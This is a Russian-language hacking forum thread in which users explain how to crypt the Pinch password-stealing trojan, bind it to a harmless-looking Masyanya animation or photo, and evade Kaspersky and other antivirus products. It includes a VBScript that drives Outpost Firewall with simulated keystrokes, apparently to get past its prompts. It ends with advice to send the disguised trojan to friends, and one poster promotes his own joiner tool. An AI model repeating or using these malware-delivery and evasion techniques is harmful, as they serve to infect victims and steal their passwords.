• XSS.stack #1 – первый литературный журнал от юзеров форума

Прячем MICROJOIN'енные файлы

у меня не криптуется этим вашим SVKP склеенные файлы Джойнером! Сам трой-пинч отдельно криптуеться, а если я его склеиваю с фоткой то выдает ошибку! Я как снимал так и ставил при склеивании галочку "паковать".... все равно никак!
А можно чисто сам трой закриптовать да и все? Не обязательно же с фоткой склеивать?

А можно чисто сам трой закриптовать да и все? Не обязательно же с фоткой склеивать?
Можно. Только как ты представляешь себе картину:
Юзер открывает файл, а там ничего... Лично у меня это вызвало бы подозрения. Хотя можешь попробывать :baby:

to WindowsME

Ок! отлично! впринципе по фиг , что картинки не будет т.к. своим друганам засылать буду и объяснять отсутствие картинки типа косяком каким-то.... это по фиг))

оо круто, не палица, но заодно он и работать перестал(
Сам с этим сталкивался... Пока не открыл свой способ криптовки, чтобы работал и не палился :rtfm:

Касперский молчал...
Веб тоже молчал (надо обновить версию)...
А вот НОД, всё-таки что-то сказал(неделю назад поставил :)).
Неплохой метод "игры в прятки".

Да тема хорошая!!! Но при распаковке спаливается всё к чертовой матери!!!
Современный джойнер шифрует файлы которые клеит, после запуска склееного файла внутренности копируются во временную папку, потом происходит рассшифровка,которая возврашает склееные файлы в исходное состояние,после чего AVP их и спаливает!!!!Вывод нужно спрятать каждый файл, потом уже клеить!!!
-----------------------------------------НАЧНЕМ-------------------------------------------
Возьмем два файла (МАСЯНЯ + PINCH)
-МАСЯНЯ чист сам по себе....Проблем нет
-PINCH советею юзать 2.57 меньше всего глюков..Вот про него тема (http://www.cheetos.1bb.ru/index.php?showtopic=26&st=0) ->
На сегоднешний день лутшее из пинчей что есть в паблике!!!Его нужно спрятать как-то 1) его можно спрятать тем самым SVKP как описывалось выше.... 2) есть другой путь почитать вот это
http://www.docent-qwer.narod.ru/chisto.rar - статья не моя,но по сей день актуальна...(СОВЕТ ВБИВАТЬ КОД ПО БЛИЖЕ К ЗАГОЛОВКУ PE-файла или в него)...Тема довольно таки сложна и потребует есилий и не малых для начала...Кому нужно сильно научиться прятать вири, тот разберется!!!
Теперь нам нужен скрипт что был в начеле этой темы - он палится Каспером, поэтому вот его чистая модификация....Просто сменили задержки по времени и каспер сдох....

Код:
set WShell = CreateObject("WScript.Shell")

WShell.Exec "C:\Program Files\Agnitum\Outpost Firewall\outpost.exe"
WScript.Sleep 250
WShell.AppActivate "Agnitum", TRUE
WScript.Sleep 200
WShell.SendKeys "{F10}{DOWN}{UP}{ENTER}"
WScript.Sleep 150
WShell.SendKeys "{ENTER}"

теперь бы все это склеить можно поступить так как говорилось в начале и обработать SVKP , я предлогая другой путь http://www.free-joiner.xportal.net.ru/
первый бесплатный джойнер...вы можете и не доверять ему,боясь подвоха!!!Я его автор и им уже на сегоднешний день пользуются около 50 человек!!!!
Выбор ваш...
После склейки тестим на каспере на чистоту и посылаем любимому другу или подруге как НОВЕЙШУЮ и Интереснейшую версию МАСЯНЬКИ...да кстати при склейки не забудь иконку нужную поставить ... i love МАСЯНЯ...

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх